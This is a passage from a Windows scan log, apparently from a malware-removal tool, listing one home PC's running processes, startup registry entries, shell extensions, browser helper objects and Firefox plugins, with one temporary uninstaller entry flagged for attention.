(Microsoft Corporation) C:\Program Files\Microsoft IntelliPoint\dpupdchk.exe
(Dropbox, Inc.) C:\Users\Ken Terry\AppData\Roaming\Dropbox\bin\Dropbox.exe
(Facebook) C:\Users\Ken Terry\AppData\Local\Facebook\Messenger\2.1.4814.0\FacebookMessenger.exe
(Intel Corporation) C:\Program Files (x86)\Intel\Intel(R) Rapid Storage Technology\IAStorIcon.exe
(Hewlett-Packard) C:\Program Files (x86)\Hewlett-Packard\HP MAINSTREAM KEYBOARD\BATINDICATOR.exe
(Advanced Micro Devices Inc.) C:\Program Files (x86)\ATI Technologies\ATI.ACE\Core-Static\MOM.exe
(Hewlett-Packard) C:\Program Files (x86)\Hp\HP Software Update\hpwuschd2.exe
(Reason Software Company Inc.) C:\Program Files\Reason\Security\rsUI.exe
(Hewlett-Packard) C:\Program Files (x86)\Hewlett-Packard\HP MAINSTREAM KEYBOARD\CNYHKEY.exe
(Advanced Micro Devices Inc.) C:\Program Files (x86)\ATI Technologies\ATI.ACE\Core-Static\CCC.exe
() C:\Program Files\Intel\SUR\WILLAMETTE\ESRV\esrv_svc.exe
(Raptr, Inc) C:\Program Files (x86)\Raptr\raptr.exe
(Raptr, Inc) C:\Program Files (x86)\Raptr\raptr_im.exe
(Raptr Inc.) C:\Program Files (x86)\Raptr\raptr_ep64.exe
(Hewlett-Packard Company) C:\Program Files (x86)\Hewlett-Packard\HP Support Framework\HPSA_Service.exe
(Intel Corporation) C:\Program Files (x86)\Intel\Intel(R) Rapid Storage Technology\IAStorDataMgrSvc.exe
(Intel Corporation) C:\Program Files (x86)\Intel\Intel(R) Management Engine Components\UNS\UNS.exe
(Google Inc.) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
(Google Inc.) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
(Google Inc.) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
(Google Inc.) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
(Microsoft Corporation) C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe
(Microsoft Corporation) C:\Windows\System32\browser_broker.exe
(Microsoft Corporation) C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
(Microsoft Corporation) C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
(Google Inc.) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
(Adobe Systems Incorporated) C:\Program Files (x86)\Common Files\Adobe\OOBE\PDApp\UWA\AAM Updates Notifier.exe
(Adobe Systems Incorporated) C:\Windows\System32\Macromed\Flash\FlashUtil_ActiveX.exe
(Microsoft Corporation) C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe


==================== Registry (Whitelisted) ===========================

(If an entry is included in the fixlist, the registry item will be restored to default or removed. The file will not be moved.)

HKLM\...\Run: [RTHDVCPL] => C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exe [13885696 2015-06-24] (Realtek Semiconductor)
HKLM\...\Run: [hpsysdrv] => c:\program files (x86)\hewlett-packard\HP odometer\hpsysdrv.exe [62768 2008-11-20] (Hewlett-Packard)
HKLM\...\Run: [SmartMenu] => C:\Program Files\Hewlett-Packard\HP MediaSmart\SmartMenu.exe [568888 2010-01-18] ()
HKLM\...\Run: [SPC230NC_Monitor] => C:\Windows\Philips\SPC230NC\Monitor.exe
HKLM\...\Run: [SPC_Monitor] => C:\Windows\Philips\SPC230NC\Monitor.exe
HKLM\...\Run: [IntelliPoint] => C:\Program Files\Microsoft IntelliPoint\ipoint.exe [2327952 2010-07-21] (Microsoft Corporation)
HKLM\...\Run: [AdobeAAMUpdater-1.0] => C:\Program Files (x86)\Common Files\Adobe\OOBE\PDApp\UWA\UpdaterStartupUtility.exe [557768 2015-02-03] (Adobe Systems Incorporated)
HKLM\...\Run: [iTunesHelper] => C:\Program Files\iTunes\iTunesHelper.exe [170256 2015-08-13] (Apple Inc.)
HKLM-x32\...\Run: [StartCCC] => C:\Program Files (x86)\ATI Technologies\ATI.ACE\Core-Static\amd64\CLIStart.exe [767176 2015-08-03] (Advanced Micro Devices, Inc.)
HKLM-x32\...\Run: [PDF Complete] => C:\Program Files (x86)\PDF Complete\pdfsty.exe [563736 2009-10-14] (PDF Complete Inc)
HKLM-x32\...\Run: [IAStorIcon] => C:\Program Files (x86)\Intel\Intel(R) Rapid Storage Technology\IAStorIcon.exe [284440 2011-04-30] (Intel Corporation)
HKLM-x32\...\Run: [BATINDICATOR] => C:\Program Files (x86)\Hewlett-Packard\HP MAINSTREAM KEYBOARD\BATINDICATOR.exe [2068992 2009-05-08] (Hewlett-Packard)
HKLM-x32\...\Run: [LaunchHPOSIAPP] => C:\Program Files (x86)\Hewlett-Packard\HP MAINSTREAM KEYBOARD\LaunchApp.exe [385024 2009-04-03] (Hewlett-Packard)
HKLM-x32\...\Run: [Norton Online Backup] => C:\Program Files (x86)\Symantec\Norton Online Backup\NOBuClient.exe [1155928 2010-06-01] (Symantec Corporation)
HKLM-x32\...\Run: [Microsoft Default Manager] => "C:\Program Files (x86)\Microsoft\Search Enhancement Pack\Default Manager\DefMgr.exe" -resume
HKLM-x32\...\Run: [AdobeCS5.5ServiceManager] => C:\Program Files (x86)\Common Files\Adobe\CS5.5ServiceManager\CS5.5ServiceManager.exe [1523360 2011-01-12] (Adobe Systems Incorporated)
HKLM-x32\...\Run: [AdobeCS6ServiceManager] => C:\Program Files (x86)\Common Files\Adobe\CS6ServiceManager\CS6ServiceManager.exe [1073312 2012-03-09] (Adobe Systems Incorporated)
HKLM-x32\...\Run: [SwitchBoard] => C:\Program Files (x86)\Common Files\Adobe\SwitchBoard\SwitchBoard.exe [517096 2010-02-19] (Adobe Systems Incorporated)
HKLM-x32\...\Run: [APSDaemon] => C:\Program Files (x86)\Common Files\Apple\Apple Application Support\APSDaemon.exe [60712 2015-05-15] (Apple Inc.)
HKLM-x32\...\Run: [HP Software Update] => C:\Program Files (x86)\HP\HP Software Update\HPWuSchd2.exe [49208 2011-10-28] (Hewlett-Packard)
HKLM-x32\...\Run: [Raptr] => C:\Program Files (x86)\Raptr\raptrstub.exe [56080 2015-07-27] (Raptr, Inc)
HKLM-x32\...\Run: [QuickTime Task] => C:\Program Files (x86)\QuickTime\QTTask.exe [421888 2015-06-17] (Apple Inc.)
HKU\S-1-5-21-2815594105-2774959023-4293743994-1001\...\Run: [DriverFinder] => C:\Program Files (x86)\DriverFinder\DriverFinder.exe
HKU\S-1-5-21-2815594105-2774959023-4293743994-1001\...\Run: [swg] => C:\Program Files (x86)\Google\GoogleToolbarNotifier\GoogleToolbarNotifier.exe [39408 2011-11-29] (Google Inc.)
HKU\S-1-5-21-2815594105-2774959023-4293743994-1001\...\Run: [HP Officejet 6700 (NET)] => C:\Program Files\hp\HP Officejet 6700\Bin\ScanToPCActivationApp.exe [2676584 2011-09-09] (Hewlett-Packard Co.)
HKU\S-1-5-21-2815594105-2774959023-4293743994-1001\...\Run: [HP Officejet 6700 (NET) #2] => C:\Program Files\hp\HP Officejet 6700\Bin\ScanToPCActivationApp.exe [2676584 2011-09-09] (Hewlett-Packard Co.)
HKU\S-1-5-21-2815594105-2774959023-4293743994-1001\...\Run: [Facebook Update] => C:\Users\Ken Terry\AppData\Local\Facebook\Update\FacebookUpdate.exe [138096 2013-05-02] (Facebook Inc.)
HKU\S-1-5-21-2815594105-2774959023-4293743994-1001\...\Run: [A3BF49ACEB10C29711B328C03B82D6FE2CE22E98._service_run] => C:\Program Files (x86)\Google\Chrome\Application\chrome.exe [815944 2015-09-11] (Google Inc.)
HKU\S-1-5-21-2815594105-2774959023-4293743994-1001\...\Run: [EADM] => C:\Program Files (x86)\Origin\Origin.exe [3632112 2015-07-15] (Electronic Arts)
HKU\S-1-5-21-2815594105-2774959023-4293743994-1001\...\Run: [Amazon Music] => C:\Users\Ken Terry\AppData\Local\Amazon Music\Amazon Music Helper.exe [5887808 2015-07-21] ()
HKU\S-1-5-21-2815594105-2774959023-4293743994-1001\...\Run: [WeatherBug] => C:\Program Files\Earth Networks\WeatherBug\WeatherBug.exe /fromrunkey
HKU\S-1-5-21-2815594105-2774959023-4293743994-1001\...\Run: [Dropbox Update] => C:\Users\Ken Terry\AppData\Local\Dropbox\Update\DropboxUpdate.exe [134512 2015-06-21] (Dropbox, Inc.)
HKU\S-1-5-21-2815594105-2774959023-4293743994-1001\...\Run: [Skype] => C:\Program Files (x86)\Skype\Phone\Skype.exe [53282944 2015-06-29] (Skype Technologies S.A.)
HKU\S-1-5-21-2815594105-2774959023-4293743994-1001\...\Run: [Uninstall_CToolbar] => "C:\Users\KENTER~1\AppData\Local\Temp\CUninst.exe" "/remove" <===== ATTENTION
HKU\S-1-5-21-2815594105-2774959023-4293743994-1001-{ED1FC765-E35E-4C3D-BF15-2C2B11260CE4}-0\...\Run: [DriverFinder] => C:\Program Files (x86)\DriverFinder\DriverFinder.exe
HKU\S-1-5-21-2815594105-2774959023-4293743994-1001-{ED1FC765-E35E-4C3D-BF15-2C2B11260CE4}-0\...\Run: [swg] => C:\Program Files (x86)\Google\GoogleToolbarNotifier\GoogleToolbarNotifier.exe [39408 2011-11-29] (Google Inc.)
HKU\S-1-5-21-2815594105-2774959023-4293743994-1001-{ED1FC765-E35E-4C3D-BF15-2C2B11260CE4}-0\...\Run: [HP Officejet 6700 (NET)] => C:\Program Files\hp\HP Officejet 6700\Bin\ScanToPCActivationApp.exe [2676584 2011-09-09] (Hewlett-Packard Co.)
HKU\S-1-5-21-2815594105-2774959023-4293743994-1001-{ED1FC765-E35E-4C3D-BF15-2C2B11260CE4}-0\...\Run: [HP Officejet 6700 (NET) #2] => C:\Program Files\hp\HP Officejet 6700\Bin\ScanToPCActivationApp.exe [2676584 2011-09-09] (Hewlett-Packard Co.)
HKU\S-1-5-21-2815594105-2774959023-4293743994-1001-{ED1FC765-E35E-4C3D-BF15-2C2B11260CE4}-0\...\Run: [Facebook Update] => C:\Users\Ken Terry\AppData\Local\Facebook\Update\FacebookUpdate.exe [138096 2013-05-02] (Facebook Inc.)
HKU\S-1-5-21-2815594105-2774959023-4293743994-1001-{ED1FC765-E35E-4C3D-BF15-2C2B11260CE4}-0\...\Run: [A3BF49ACEB10C29711B328C03B82D6FE2CE22E98._service_run] => C:\Program Files (x86)\Google\Chrome\Application\chrome.exe [815944 2015-09-11] (Google Inc.)
HKU\S-1-5-21-2815594105-2774959023-4293743994-1001-{ED1FC765-E35E-4C3D-BF15-2C2B11260CE4}-0\...\Run: [EADM] => C:\Program Files (x86)\Origin\Origin.exe [3632112 2015-07-15] (Electronic Arts)
HKU\S-1-5-21-2815594105-2774959023-4293743994-1001-{ED1FC765-E35E-4C3D-BF15-2C2B11260CE4}-0\...\Run: [Amazon Music] => C:\Users\Ken Terry\AppData\Local\Amazon Music\Amazon Music Helper.exe [5887808 2015-07-21] ()
HKU\S-1-5-21-2815594105-2774959023-4293743994-1001-{ED1FC765-E35E-4C3D-BF15-2C2B11260CE4}-0\...\Run: [WeatherBug] => C:\Program Files\Earth Networks\WeatherBug\WeatherBug.exe /fromrunkey
HKU\S-1-5-21-2815594105-2774959023-4293743994-1001-{ED1FC765-E35E-4C3D-BF15-2C2B11260CE4}-0\...\Run: [Dropbox Update] => C:\Users\Ken Terry\AppData\Local\Dropbox\Update\DropboxUpdate.exe [134512 2015-06-21] (Dropbox, Inc.)
HKU\S-1-5-21-2815594105-2774959023-4293743994-1001-{ED1FC765-E35E-4C3D-BF15-2C2B11260CE4}-0\...\Run: [Skype] => C:\Program Files (x86)\Skype\Phone\Skype.exe [53282944 2015-06-29] (Skype Technologies S.A.)
HKU\S-1-5-21-2815594105-2774959023-4293743994-1001-{ED1FC765-E35E-4C3D-BF15-2C2B11260CE4}-0\...\Run: [Uninstall_CToolbar] => "C:\Users\KENTER~1\AppData\Local\Temp\CUninst.exe" "/remove" <===== ATTENTION
ShellIconOverlayIdentifiers: [ GoogleDriveBlacklisted] -> {81539FE6-33C7-4CE7-90C7-1C7B8F2F2D42} => C:\Program Files (x86)\Google\Drive\googledrivesync64.dll [2015-07-29] (Google)
ShellIconOverlayIdentifiers: [ GoogleDriveSynced] -> {81539FE6-33C7-4CE7-90C7-1C7B8F2F2D40} => C:\Program Files (x86)\Google\Drive\googledrivesync64.dll [2015-07-29] (Google)
ShellIconOverlayIdentifiers: [ GoogleDriveSyncing] -> {81539FE6-33C7-4CE7-90C7-1C7B8F2F2D41} => C:\Program Files (x86)\Google\Drive\googledrivesync64.dll [2015-07-29] (Google)
ShellIconOverlayIdentifiers: [ OverlayExcluded] -> {4433A54A-1AC8-432F-90FC-85F045CF383C} => C:\Program Files (x86)\Norton Internet Security\Engine64\22.5.2.15\buShell.dll [2015-07-13] (Symantec Corporation)
ShellIconOverlayIdentifiers: [ OverlayPending] -> {F17C0B1E-EF8E-4AD4-8E1B-7D7E8CB23225} => C:\Program Files (x86)\Norton Internet Security\Engine64\22.5.2.15\buShell.dll [2015-07-13] (Symantec Corporation)
ShellIconOverlayIdentifiers: [ OverlayProtected] -> {476D0EA3-80F9-48B5-B70B-05E677C9C148} => C:\Program Files (x86)\Norton Internet Security\Engine64\22.5.2.15\buShell.dll [2015-07-13] (Symantec Corporation)
ShellIconOverlayIdentifiers: [DropboxExt1] -> {FB314ED9-A251-47B7-93E1-CDD82E34AF8B} => C:\Users\Ken Terry\AppData\Roaming\Dropbox\bin\DropboxExt64.27.dll [2015-08-14] (Dropbox, Inc.)
ShellIconOverlayIdentifiers: [DropboxExt2] -> {FB314EDA-A251-47B7-93E1-CDD82E34AF8B} => C:\Users\Ken Terry\AppData\Roaming\Dropbox\bin\DropboxExt64.27.dll [2015-08-14] (Dropbox, Inc.)
ShellIconOverlayIdentifiers: [DropboxExt3] -> {FB314EDB-A251-47B7-93E1-CDD82E34AF8B} => C:\Users\Ken Terry\AppData\Roaming\Dropbox\bin\DropboxExt64.27.dll [2015-08-14] (Dropbox, Inc.)
ShellIconOverlayIdentifiers: [DropboxExt4] -> {FB314EDC-A251-47B7-93E1-CDD82E34AF8B} => C:\Users\Ken Terry\AppData\Roaming\Dropbox\bin\DropboxExt64.27.dll [2015-08-14] (Dropbox, Inc.)
ShellIconOverlayIdentifiers: [GDriveSharedOverlay] -> {81539FE6-33C7-4CE7-90C7-1C7B8F2F2D44} => No File
ShellIconOverlayIdentifiers-x32: [DropboxExt1] -> {FB314ED9-A251-47B7-93E1-CDD82E34AF8B} => C:\Users\Ken Terry\AppData\Roaming\Dropbox\bin\DropboxExt.27.dll [2015-08-14] (Dropbox, Inc.)
ShellIconOverlayIdentifiers-x32: [DropboxExt2] -> {FB314EDA-A251-47B7-93E1-CDD82E34AF8B} => C:\Users\Ken Terry\AppData\Roaming\Dropbox\bin\DropboxExt.27.dll [2015-08-14] (Dropbox, Inc.)
ShellIconOverlayIdentifiers-x32: [DropboxExt3] -> {FB314EDB-A251-47B7-93E1-CDD82E34AF8B} => C:\Users\Ken Terry\AppData\Roaming\Dropbox\bin\DropboxExt.27.dll [2015-08-14] (Dropbox, Inc.)
Startup: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Startup\TrayMin230.lnk [2011-02-03]
ShortcutTarget: TrayMin230.lnk -> C:\Program Files (x86)\Philips\Philips SPC230NC Webcam\TrayMin230.exe ()
Startup: C:\Users\Ken Terry\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Dropbox.lnk [2014-08-25]
ShortcutTarget: Dropbox.lnk -> C:\Users\Ken Terry\AppData\Roaming\Dropbox\bin\Dropbox.exe (Dropbox, Inc.)
Startup: C:\Users\Ken Terry\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Facebook Messenger.lnk [2013-05-02]
ShortcutTarget: Facebook Messenger.lnk -> C:\Users\Ken Terry\AppData\Local\Facebook\Messenger\2.1.4814.0\FacebookMessenger.exe (Facebook)
Startup: C:\Users\Ken Terry\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Monitor Ink Alerts - .lnk [2013-03-06]
ShortcutTarget: Monitor Ink Alerts - .lnk -> C:\Program Files\hp\HP Officejet 6700\Bin\HPStatusBL.dll (Hewlett-Packard Co.)
Startup: C:\Users\Ken Terry\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Monitor Ink Alerts - HP Officejet 6700.lnk [2013-11-12]
ShortcutTarget: Monitor Ink Alerts - HP Officejet 6700.lnk -> C:\Program Files\hp\HP Officejet 6700\Bin\HPStatusBL.dll (Hewlett-Packard Co.)

==================== Internet (Whitelisted) ====================

(If an item is included in the fixlist, if it is a registry item it will be removed or restored to default.)

Hosts: There are more than one entry in Hosts. See Hosts section of Addition.txt
Tcpip\Parameters: [DhcpNameServer] 192.168.0.1
Tcpip\..\Interfaces\{62f3ae2b-33d4-4f19-9278-3f41836001ba}: [DhcpNameServer] 192.168.0.1
Tcpip\..\Interfaces\{cb4ad89f-1afe-4bc5-81f6-1c3648235f12}: [DhcpNameServer] 192.168.1.1
Tcpip\..\Interfaces\{e9b29538-c17f-432d-92db-e0a4401a8254}: [DhcpNameServer] 192.168.1.1

Internet Explorer:
==================
HKU\.DEFAULT\Software\Microsoft\Internet Explorer\Main,Start Page = hxxp://www.symantec.com/redirects/security_response/fix_homepage/index.jsp?lg=en&pid=NIS&pvid=22.5.0.124
HKU\S-1-5-21-2815594105-2774959023-4293743994-1001\Software\Microsoft\Internet Explorer\Main,Default_Page_URL = hxxp://www.yahoo.com/?fr=fp-yie9
HKU\S-1-5-21-2815594105-2774959023-4293743994-1001\Software\Microsoft\Internet Explorer\Main,Start Page Redirect Cache = hxxp://www.msn.com/
HKU\S-1-5-21-2815594105-2774959023-4293743994-1001\Software\Microsoft\Internet Explorer\Main,Start Page = hxxp://www.symantec.com/redirects/security_response/fix_homepage/index.jsp?lg=en&pid=NIS&pvid=22.5.0.124
HKU\S-1-5-21-2815594105-2774959023-4293743994-1001-{ED1FC765-E35E-4C3D-BF15-2C2B11260CE4}-0\Software\Microsoft\Internet Explorer\Main,Default_Page_URL = hxxp://www.yahoo.com/?fr=fp-yie9
HKU\S-1-5-21-2815594105-2774959023-4293743994-1001-{ED1FC765-E35E-4C3D-BF15-2C2B11260CE4}-0\Software\Microsoft\Internet Explorer\Main,Start Page Redirect Cache = hxxp://www.msn.com/
HKU\S-1-5-21-2815594105-2774959023-4293743994-1001-{ED1FC765-E35E-4C3D-BF15-2C2B11260CE4}-0\Software\Microsoft\Internet Explorer\Main,Start Page = hxxp://www.symantec.com/redirects/security_response/fix_homepage/index.jsp?lg=en&pid=NIS&pvid=22.5.0.124
URLSearchHook: HKLM-x32 - Yahoo! Axis for IE - {035FDC10-9F1D-430E-87DA-573FFBF5608D} - C:\Program Files (x86)\Yahoo!\YNanoClient\cpn1\YNanoClient_IE.dll (Yahoo! Inc.)
SearchScopes: HKLM -> {1AC5E05E-C560-46B2-83AB-4E5DBB92F2B2} URL = hxxp://en.wikipedia.org/wiki/Special:Search?search={searchTerms}
SearchScopes: HKLM -> {258733A6-9B2C-4CE8-AC9D-3793C0E89DA6} URL = hxxp://search.yahoo.com/search?p={searchTerms}&ei={inputEncoding}&fr=chr-hp-psg&type=HPDTDF
SearchScopes: HKLM -> {9693B710-7943-4C03-B346-5F8ABAFDFD28} URL = hxxp://www.bing.com/search?q={searchTerms}&form=HPDTDF&pc=HPDTDF&src=IE-SearchBox
BHO: Norton Identity Protection -> {602ADB0E-4AFF-4217-8AA1-95DAC4DFA408} -> C:\Program Files (x86)\Norton Internet Security\Engine64\22.5.2.15\coIEPlg.dll [2015-07-09] (Symantec Corporation)
BHO: Google Toolbar Helper -> {AA58ED58-01DD-4d91-8333-CF10577473F7} -> C:\Program Files (x86)\Google\Google Toolbar\GoogleToolbar_64.dll [2015-07-20] (Google Inc.)
BHO: Skype Click to Call for Internet Explorer -> {AE805869-2E5C-4ED4-8F7B-F1F7851A4497} -> C:\Program Files (x86)\Skype\Toolbars\Internet Explorer x64\skypeieplugin.dll [2015-05-01] (Microsoft Corporation)
BHO: Office Document Cache Handler -> {B4F3A835-0E21-4959-BA22-42B3008E02FF} -> C:\Program Files\Microsoft Office\Office14\URLREDIR.DLL [2013-03-06] (Microsoft Corporation)
BHO: HP Network Check Helper -> {E76FD755-C1BA-4DCB-9F13-99BD91223ADE} -> C:\Program Files (x86)\Hewlett-Packard\HP Support Framework\Resources\HPNetworkCheck\HPNetworkCheckPluginx64.dll [2013-08-28] (Hewlett-Packard)
BHO-x32: Yahoo! Axis for IE -> {035FDC10-9F1D-430E-87DA-573FFBF5608D} -> C:\Program Files (x86)\Yahoo!\YNanoClient\cpn1\YNanoClient_IE.dll [2012-10-13] (Yahoo! Inc.)
BHO-x32: MSS+ Identifier -> {0E8A89AD-95D7-40EB-8D9D-083EF7066A01} -> C:\Program Files\McAfee Security Scan\3.8.130\McAfeeMSS_IE.dll [2013-09-06] (McAfee, Inc.)
BHO-x32: Norton Identity Protection -> {602ADB0E-4AFF-4217-8AA1-95DAC4DFA408} -> C:\Program Files (x86)\Norton Internet Security\Engine\22.5.2.15\coIEPlg.dll [2015-07-09] (Symantec Corporation)
BHO-x32: Norton Vulnerability Protection -> {6D53EC84-6AAE-4787-AEEE-F4628F01010C} -> C:\Program Files (x86)\Norton Internet Security\Engine\21.7.0.11\IPS\IPSBHO.DLL No File
BHO-x32: Java(tm) Plug-In SSV Helper -> {761497BB-D6F0-462C-B6EB-D4DAF1D92D43} -> C:\Program Files (x86)\Java\jre1.8.0_31\bin\ssv.dll [2015-01-24] (Oracle Corporation)
BHO-x32: Google Toolbar Helper -> {AA58ED58-01DD-4d91-8333-CF10577473F7} -> C:\Program Files (x86)\Google\Google Toolbar\GoogleToolbar_32.dll [2015-07-20] (Google Inc.)
BHO-x32: Skype Click to Call for Internet Explorer -> {AE805869-2E5C-4ED4-8F7B-F1F7851A4497} -> C:\Program Files (x86)\Skype\Toolbars\Internet Explorer\SkypeIEPlugin.dll [2015-05-01] (Microsoft Corporation)
BHO-x32: Office Document Cache Handler -> {B4F3A835-0E21-4959-BA22-42B3008E02FF} -> C:\Program Files (x86)\Microsoft Office\Office14\URLREDIR.DLL [2013-03-06] (Microsoft Corporation)
BHO-x32: Java(tm) Plug-In 2 SSV Helper -> {DBC80044-A445-435b-BC74-9C25C1C588A9} -> C:\Program Files (x86)\Java\jre1.8.0_31\bin\jp2ssv.dll [2015-01-24] (Oracle Corporation)
BHO-x32: HP Network Check Helper -> {E76FD755-C1BA-4DCB-9F13-99BD91223ADE} -> C:\Program Files (x86)\Hewlett-Packard\HP Support Framework\Resources\HPNetworkCheck\HPNetworkCheckPlugin.dll [2013-08-28] (Hewlett-Packard)
Toolbar: HKLM - Norton Toolbar - {7FEBEFE3-6B19-4349-98D2-FFB09D4B49CA} - C:\Program Files (x86)\Norton Internet Security\Engine64\22.5.2.15\coIEPlg.dll [2015-07-09] (Symantec Corporation)
Toolbar: HKLM - Google Toolbar - {2318C2B1-4965-11d4-9B18-009027A5CD4F} - C:\Program Files (x86)\Google\Google Toolbar\GoogleToolbar_64.dll [2015-07-20] (Google Inc.)
Toolbar: HKLM-x32 - Yahoo! Axis for IE - {035FDC10-9F1D-430E-87DA-573FFBF5608D} - C:\Program Files (x86)\Yahoo!\YNanoClient\cpn1\YNanoClient_IE.dll [2012-10-13] (Yahoo! Inc.)
Toolbar: HKLM-x32 - Norton Toolbar - {7FEBEFE3-6B19-4349-98D2-FFB09D4B49CA} - C:\Program Files (x86)\Norton Internet Security\Engine\22.5.2.15\coIEPlg.dll [2015-07-09] (Symantec Corporation)
Toolbar: HKLM-x32 - Google Toolbar - {2318C2B1-4965-11d4-9B18-009027A5CD4F} - C:\Program Files (x86)\Google\Google Toolbar\GoogleToolbar_32.dll [2015-07-20] (Google Inc.)
Toolbar: HKU\S-1-5-21-2815594105-2774959023-4293743994-1001 -> Google Toolbar - {2318C2B1-4965-11D4-9B18-009027A5CD4F} - C:\Program Files (x86)\Google\Google Toolbar\GoogleToolbar_64.dll [2015-07-20] (Google Inc.)
Toolbar: HKU\S-1-5-21-2815594105-2774959023-4293743994-1001-{ED1FC765-E35E-4C3D-BF15-2C2B11260CE4}-0 -> Google Toolbar - {2318C2B1-4965-11D4-9B18-009027A5CD4F} - C:\Program Files (x86)\Google\Google Toolbar\GoogleToolbar_64.dll [2015-07-20] (Google Inc.)
DPF: HKLM {73ECB3AA-4717-450C-A2AB-D00DAD9EE203} hxxp://h20270.www2.hp.com/ediags/gmn2/install/HPProductDetection2.cab
DPF: HKLM-x32 {02BCC737-B171-4746-94C9-0D8A0B2C0089} hxxp://office.microsoft.com/sites/production/ieawsdc32.cab
Handler: skypec2c - {91774881-D725-4E58-B298-07617B9B86A8} - C:\Program Files (x86)\Skype\Toolbars\Internet Explorer x64\skypeieplugin.dll [2015-05-01] (Microsoft Corporation)
Handler-x32: skypec2c - {91774881-D725-4E58-B298-07617B9B86A8} - C:\Program Files (x86)\Skype\Toolbars\Internet Explorer\SkypeIEPlugin.dll [2015-05-01] (Microsoft Corporation)

FireFox:
========
FF ProfilePath: C:\Users\Ken Terry\AppData\Roaming\Mozilla\Firefox\Profiles\8e7n9o3j.default
FF DefaultSearchEngine: Google
FF DefaultSearchEngine.US: Google
FF Homepage: google.com
FF Plugin: @adobe.com/FlashPlayer -> C:\Windows\system32\Macromed\Flash\NPSWF64_18_0_0_232.dll [2015-08-11] ()
FF Plugin: @Microsoft.com/NpCtrl,version=1.0 -> c:\Program Files\Microsoft Silverlight\5.1.40728.0\npctrl.dll [2015-07-28] ( Microsoft Corporation)
FF Plugin: @microsoft.com/OfficeAuthz,version=14.0 -> C:\PROGRA~1\MICROS~2\Office14\NPAUTHZ.DLL [2010-01-09] (Microsoft Corporation)
FF Plugin: adobe.com/AdobeAAMDetect -> C:\Program Files (x86)\Common Files\Adobe\OOBE\PDApp\CCM\Utilities\npAdobeAAMDetect64.dll [No File]
FF Plugin-x32: @adobe.com/FlashPlayer -> C:\Windows\SysWOW64\Macromed\Flash\NPSWF32_18_0_0_232.dll [2015-08-11] ()
FF Plugin-x32: @Apple.com/iTunes,version=1.0 -> C:\Program Files (x86)\iTunes\Mozilla Plugins\npitunes.dll [2015-07-30] ()
FF Plugin-x32: @Google.com/GoogleEarthPlugin -> C:\Program Files (x86)\Google\Google Earth\plugin\npgeplugin.dll [2013-10-07] (Google)
FF Plugin-x32: @java.com/DTPlugin,version=11.31.2 -> C:\Program Files (x86)\Java\jre1.8.0_31\bin\dtplugin\npDeployJava1.dll [2015-01-24] (Oracle Corporation)
FF Plugin-x32: @java.com/JavaPlugin,version=11.31.2 -> C:\Program Files (x86)\Java\jre1.8.0_31\bin\plugin2\npjp2.dll [2015-01-24] (Oracle Corporation)
FF Plugin-x32: @mcafee.com/McAfeeMssPlugin -> C:\Program Files\McAfee Security Scan\3.8.130\npMcAfeeMss.dll [2013-09-06] (McAfee, Inc.)
FF Plugin-x32: @Microsoft.com/NpCtrl,version=1.0 -> c:\Program Files (x86)\Microsoft Silverlight\5.1.40728.0\npctrl.dll [2015-07-28] ( Microsoft Corporation)
FF Plugin-x32: @microsoft.com/OfficeAuthz,version=14.0 -> C:\PROGRA~2\MICROS~1\Office14\NPAUTHZ.DLL [2010-01-09] (Microsoft Corporation)
FF Plugin-x32: @microsoft.com/SharePoint,version=14.0 -> C:\PROGRA~2\MICROS~1\Office14\NPSPWRAP.DLL [2010-03-24] (Microsoft Corporation)
FF Plugin-x32: @microsoft.com/WLPG,version=15.4.3502.0922 -> C:\Program Files (x86)\Windows Live\Photo Gallery\NPWLPG.dll [2012-03-08] (Microsoft Corporation)
FF Plugin-x32: @microsoft.com/WLPG,version=15.4.3508.1109 -> C:\Program Files (x86)\Windows Live\Photo Gallery\NPWLPG.dll [2012-03-08] (Microsoft Corporation)
FF Plugin-x32: @microsoft.com/WLPG,version=15.4.3555.0308 -> C:\Program Files (x86)\Windows Live\Photo Gallery\NPWLPG.dll [2012-03-08] (Microsoft Corporation)
FF Plugin-x32: @oberon-media.com/ONCAdapter -> C:\Program Files (x86)\Common Files\Oberon Media\NCAdapter\1.0.0.7\npapicomadapter.dll [2010-09-01] (Oberon-Media )
FF Plugin-x32: @rocketlife.com/RocketLife Secure Plug-In Layer;version=1.0.5 -> C:\ProgramData\Visan\plugins\npRLSecurePluginLayer.dll [2013-02-14] (RocketLife, LLP)
FF Plugin-x32: @tools.google.com/Google Update;version=3 -> C:\Program Files (x86)\Google\Update\1.3.28.15\npGoogleUpdate3.dll [2015-09-14] (Google Inc.)
FF Plugin-x32: @tools.google.com/Google Update;version=9 -> C:\Program Files (x86)\Google\Update\1.3.28.15\npGoogleUpdate3.dll [2015-09-14] (Google Inc.)
FF Plugin-x32: @WildTangent.com/GamesAppPresenceDetector,Version=1.0 -> C:\Program Files (x86)\WildTangent Games\App\BrowserIntegration\Registered\4\NP_wtapp.dll [2014-05-13] ()
FF Plugin-x32: @zylom.com/ZylomGamesPlayer -> C:\ProgramData\Zylom\ZylomGamesPlayer\npzylomgamesplayer.dll [2009-07-02] (Zylom)
FF Plugin-x32: Adobe Reader -> C:\Program Files (x86)\Adobe\Reader 11.0\Reader\AIR\nppdf32.dll [2015-06-29] (Adobe Systems Inc.)
FF Plugin HKU\S-1-5-21-2815594105-2774959023-4293743994-1001: @citrixonline.com/appdetectorplugin -> C:\Users\Ken Terry\AppData\Local\Citrix\Plugins\104\npappdetector.dll [2014-05-22] (Citrix Online)
